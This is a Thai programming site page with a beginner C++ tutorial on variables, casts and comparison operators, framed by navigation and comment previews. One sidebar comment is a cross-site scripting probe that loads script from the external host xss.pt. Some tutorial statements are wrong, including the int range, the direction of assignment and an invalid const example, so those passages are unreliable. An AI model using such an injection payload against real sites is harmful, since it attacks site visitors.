หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 C++ Tutorial  

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 C++
 
 

ตัวแปร

 

ในบทนี้เราจะมาพูดถึงตัวแปรชนิดต่างๆกันนะครับ

   
 
#include <iostream.h>
int main()
{ int a,b; char c,d; float e,f; a=5; b=65; c='D'; d=68; e=1.25; f=35.225;
cout<<a<<"\n"; cout<<b<<"\n"; cout<<c<<"\n"; cout<<d<<"\n"; cout<<e<<"\n"; cout<<f<<"\n";
return 0; }
 
   

[Download Code]

ตัวแปรชนิดแรก ก็คือ Integer นะครับ โดยมีค่าตั้งแต่ -2,147,483,647 ถึง 2,147,483,647 และมีวิธีใช้คือ int ตัวแปร

ตัวแปรชนิดที่สองคือ char ครับ โดยเป็นตัวแปรที่นิยมใช้เก็บตัวอักษรชนิดต่างๆ โดยมีค่าตั้งแต่ -128 ถึง 127 และมีวิธีใช้คือ char ตัวแปร

ตัวแปรชนิดที่สามคือ float ครับ โดยจะเป็นตัวแปรที่ใช้เก็บตัวเลขที่มีทศนิยมครับ วิธีใช้คือ float ตัวแปร

การให้ค่าตัวแปรก็อย่างที่เห็นนะแหละครับ จากนั้นเราก็ใช้คำสั่ง cout พิมพ์ตัวแปรต่างๆออกมา ให้สังเกตวิธีการให้ค่าตัวแปรดีๆนะครับ จะเห็นว่าตัวแปร c และ d เป็นตัวแปรชนิด char เหมือนกัน แต่หากต้องการให้ค่าเป็นตัวอักษรเลย ก็ให้ใช้ '' ครับ ส่วน 68 นั้นก็จะมีค่าเท่ากับ D นะครับ

เมื่อ Run โปแกรมออกมาจะเห็นว่า c และ d พิมพ์ออกมาเป็นตัวอักษรเหมือนกัน นี่ก็เป็นเพราะเมื่อเราใช้คำสั่ง cout มันก็จะไปตรวจชนิดของตัวแปร แล้วจึงพิมพ์ออกมา นี่แหละครับคือความสามารถของ OOP ใน C++ ครับ

นอกจากตัวแปรเหล่านี้แล้วยังมีตัวแปรชนิดอื่นอีกมากมายนะครับ เพื่อนๆก็ลองไปหาศึกษาดูนะครับ

การให้ค่าตัวแปรชนิดต่างกัน

   
 
#include <iostream.h>
int main()
{
int a=10;
char b=65;
float c=1.7;
const int d=5;
a=(int)b; cout<<a<<"\n";
a=(int)c; cout<<a<<"\n";
a=int(b)+int(c); cout<<a<<"\n";
cout<<d<<"\n";
return 0; }
 
   

[Download Code]

การให้ค่าตัวแปรชนิดต่างกันแก่กันนั้น จะเห็นว่ามีการใช้ (ชนิดตัวแปร)ตัวแปร หรือ ชนิดตัวแปร(ตัวแปร) ก็มีค่าเท่ากันนะครับ

ขออธิบายจุดเล็กๆ น้อยๆ หน่อยนะครับ นั่นคือ a=b คำสั่งนี้ไม่ใช่หมายความว่าให้ a=b นะครับ แต่หมายความว่าให้นำค่า b ไปให้กับค่า a ครับ คือ นำค่าทางซ้ายไปให้ค่าทางขวา ส่วนการเปลี่ยนตัวแปรชนิด float เป็น integer นั้นจะเป็นการปัดเศษทิ้งครับ

ส่วนที่ใหม่ในตัวอย่างนี้ก็คือ const ครับ คำสั่งนี้ เป็นคำสั่งที่ใช้สำหรับสร้างตัวแปรขึ้นมา ซึ่งตัวแปรนี้จะไม่สามารถเปลี่ยนค่าได้ครับ ส่วนวิธีการใช้ก็คือ const ชนิดตัวแปร ตัวแปร เช่น const char 'd'; ,const float f; เป็นต้น

การเปรียบเทียบ

   
 
#include <iostream.h>
int main()
{
int a=10,b=10,c;
char d=10,e=10,f;
float g=1.5,h=1.5,i;
if(a==b)c=10; if(a>b)c=5; if(g>=h)i=1.5; if(d!=e)f=10; if(!(d!=e))f=5; if(c=(a==b))i=10.4; if(a=d)i=2.5; a=b=c=10; if((a==b)&&(c==d))f=66;
if((a>b)||(a==b))i=10.5; if(a=0)b=50; return 0; }
 
   

[Download Code]

หลายคนอาจจะงงกับตัวอย่างข้างบนนะครับ แต่ก็ไม่เป็นไรครับ ตัวอย่างข้างบนพออธิบายได้ดังนี้ครับ

คำสั่งเปรียบเทียบแรกคือ == คือการเปรียบเทียบว่าเท่ากันหรือไม่ ถ้าเท่ากันก็ให้ c=10 ส่วนเครื่องหมายอื่นก็คือ

> คือ เครื่องหมายมากกว่า

< คือ เครื่องหมายน้อยกว่า

!= คือ เครื่องหมายไม่เท่ากับ

ในส่วนที่สองมีเครื่องหมาย ! อยู่หน้าประโยคเปรียบเทียบ หมายความว่าให้ตรงกันข้ามกัน นั่นคือ if(d!=e) จะให้ผลตรงกันข้ามกับ (!(d!=e))

จากคำสั่ง if(c=(a==b)) เป็นการบอกให้ c เท่ากับผลการเปรียบเทียบของ a==b โดยถ้าเป็นจริง c จะได้ค่า เป็น 1 แต่ถ้าเป็นเท็จจะได้ค่าเป็น 0 ครับ

จากตัวอย่างจะเห็นการใช้เครื่องหมาย && และ || โดย

&& คือ เครื่องหมาย and หมายถึง จะได้เป็นจริงเมื่อ ประโยคทั้งสองประโยคจะต้องเป็นจริงทั้งคู่

|| คือ เครื่องหมาย or หมายถึง จะได้เป็นจริงเมื่อ ประโยคใดประโยคหนึ่งเป็นจริง

จากคำสั่ง if(a=0) ในส่วนสุดท้าย จะเป็นการกำหนดค่า 0 ให้กับตัวแปร a ซึ่งเมื่อ a มีค่าเป็น 0 จะทำให้เงื่อนไข if เป็นเท็จ (ถ้าค่า a มีค่ามากว่า 0 เงื่อนไขของ if จะเป็นจริง)

 

BACK

หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th